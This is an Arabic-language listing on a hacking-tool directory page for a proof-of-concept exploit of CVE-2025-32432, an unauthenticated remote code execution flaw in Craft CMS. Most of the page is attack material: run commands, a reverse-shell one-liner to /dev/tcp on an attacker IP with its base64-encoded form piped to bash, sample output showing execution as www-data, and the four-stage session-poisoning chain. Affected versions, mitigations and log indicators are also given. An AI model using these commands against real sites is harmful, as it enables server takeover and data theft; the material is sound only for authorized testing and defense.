Skip to content
KitploitKITPLOIT
أدواتعمليات الاستغلالالمدونة
Log in
إرسال
أدواتعمليات الاستغلالالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-32432 — استغلال، POC لثغرة CVE-2025-32432، CraftCMS2Shell | Kitploit
أدوات/GitHubGitHub/c0gnit00/cve-2025-32432
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالفريق الأحمرتطوير الحمولات
GitHubc0gnit00/cve-2025-32432

CVE-2025-32432

استغلال، POC لثغرة CVE-2025-32432، CraftCMS2Shell

عرض المستودع
37منذ 2 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2025-32432: PoC لاستغلال RCE قبل المصادقة في Craft CMS

ثغرة حرجة لتنفيذ الأوامر عن بُعد قبل المصادقة في Craft CMS

الإصدارات المتأثرة: Craft CMS 3.x و4.x و5.x (حتى 5.6.16)

معلومة: تم اختبار هذا الاستغلال على جهاز HackTheBox Orion

نظرة عامة

يحتوي هذا المستودع على استغلال برهان المفهوم لثغرة CVE-2025-32432، وهي ثغرة حرجة لتنفيذ الأوامر عن بُعد قبل المصادقة في Craft CMS. تتيح هذه الثغرة لمهاجم غير مصادَق تنفيذ كود PHP عشوائي على الخادم من خلال استغلال آلية إرفاق السلوكيات في Yii2 وإنشاء مثيلات كائنات PHP عبر تقنية تجاوز __class.

درجة CVSS: 10.0 (حرجة)

الميزات

  • الاستغلال قبل المصادقة — لا يتطلب بيانات اعتماد تسجيل الدخول
  • توافق شامل — يعمل عبر Craft CMS 3.x و4.x و5.x
  • اكتشاف تلقائي لمعرّف الأصل (Asset ID) — يجرّب معرّفات الأصول الصالحة تلقائيًا
  • استخراج رمز CSRF — يتعامل تلقائيًا مع حماية CSRF في Craft CMS
  • مسار جلسة احتياطي — يعيد المحاولة تلقائيًا بمسارات جلسات PHP بديلة إذا فشل المسار الأول

المتطلبات

pip install requests urllib3

البدء السريع

تنفيذ أمر أساسي

python3 exploit.py -u http://target.com -c "id"

قشرة عكسية (Reverse Shell)

# Start listener on your machine
penelope -p 4444

# base64 encode the payload
echo 'exec bash -i >& /dev/tcp/10.10.14.31/4444 0>&1' | base64


# Run exploit
python3 exploit.py -u http://orion.htb -c "echo 'ZXhlYyBiYXNoIC1pID4mIC9kZXYvdGNwLzEwLjEwLjE0LjMxLzQ0NDQgMD4mMQo=' | base64 -d | bash"

تخطي تجربة معرّف الأصل (إذا كان معروفًا)

python3 exploit.py -u http://target.com -c "whoami" -a 11

استخدام مسار جلسة بديل

python3 exploit.py -u http://target.com -c "id" \
  -s "/tmp/sess_{}"

الاستخدام

usage: exploit.py [-h] -u URL -c COMMAND [-a ASSET_ID] [-m MAX_ASSET]
                                [-s SESSION_PATH] [-q]

CVE-2025-32432 Craft CMS Pre-Auth RCE Exploit v2

options:
  -h, --help            show this help message and exit
  -u, --url URL         Target URL (e.g., http://target.com)
  -c, --command COMMAND
                        Command to execute
  -a, --asset-id ASSET_ID
                        Known valid asset ID (skip brute-force)
  -m, --max-asset MAX_ASSET
                        Max asset ID to brute-force (default: 300)
  -s, --session-path SESSION_PATH
                        Session file path template (default: /var/lib/php/sessions/sess_{})
  -q, --quiet           Suppress verbose output

مثال على المخرجات

$ python3 exploit.py -u http://orion.htb -c "id"

╔══════════════════════════════════════════════════════════════╗
║  CVE-2025-32432 Craft CMS Pre-Auth RCE PoC v2              ║
║  Target: http://orion.htb                                  ║
║  Command: id                                                  ║
╚══════════════════════════════════════════════════════════════╝

[+] Stage 1: Getting session cookie and CSRF token...
[✓] Session ID: q6458g6g8njeimu59n9l65cu1e
[✓] CSRF Token: ofuxX9FLAA7gSDxLqxYtJGLZVHpPCm...
[+] Stage 2: Poisoning session file with PHP code...
[+] Poison request returned: 200
[✓] Session file poisoned
[+] Stage 3: Brute-forcing asset ID (1-300)...
[✓] Valid asset ID found: 1 (HTTP 200)
[+] Stage 4: Triggering RCE via PhpManager gadget chain...
[+] Target session file: /var/lib/php/sessions/sess_q6458g6g8njeimu59n9l65cu1e
[+] Trigger request returned: 200
[✓] COMMAND OUTPUT:
============================================================
uid=33(www-data) gid=33(www-data) groups=33(www-data)
============================================================

مراحل الاستغلال

المرحلةالإجراءنقطة النهايةالمصادقة
1استخراج ملف تعريف الجلسة (cookie) + رمز CSRFGET /admin/loginلا
2حقن حمولة PHP في ملف الجلسةGET /index.php?p=admin/dashboard&a=<PHP>لا
3تجربة معرّفات الأصول الصالحةPOST /index.php?p=admin/actions/assets/generate-transformلا
4تشغيل RCE عبر أداة PhpManagerPOST /index.php?p=admin/actions/assets/generate-transform&cmd=<CMD>لا

الإصدارات المتأثرة

الفرعالمتأثرالمُصلَح
3.x3.0.0-RC1 – 3.9.143.9.15+
4.x4.0.0-RC1 – 4.14.144.14.15+
5.x5.0.0-RC1 – 5.6.165.6.17+

التخفيف

  1. قم بالترقية فورًا إلى أحدث إصدار مُصحح
  2. راقب السجلات بحثًا عن:
    • طلبات POST متعددة إلى /admin/actions/assets/generate-transform
    • طلبات GET لصفحات الإدارة مع معامل a= يحتوي على كود PHP
    • وجود حقول as في أجسام طلبات POST
  3. فعّل قواعد جدار حماية تطبيقات الويب (WAF) لحظر الأنماط المشبوهة

الاعتمادات

  • الاكتشاف الأصلي: Orange Cyberdefense / SensePost
  • مقال المدونة: التحقيق في حملة حقيقية تستخدم RCE في CraftCMS
  • مؤلف PoC: استنادًا إلى أبحاث SensePost، مُكيَّف لاختبارات الاختراق HTB

إخلاء المسؤولية

هذه الأداة مخصصة لأغراض اختبار الأمان والأبحاث المصرح بها فقط. الوصول غير المصرح به إلى أنظمة الكمبيوتر غير قانوني. احصل دائمًا على التصريح المناسب قبل إجراء الاختبار.

الترخيص

رخصة MIT - راجع ملف LICENSE للحصول على التفاصيل.

تنزيل الأداة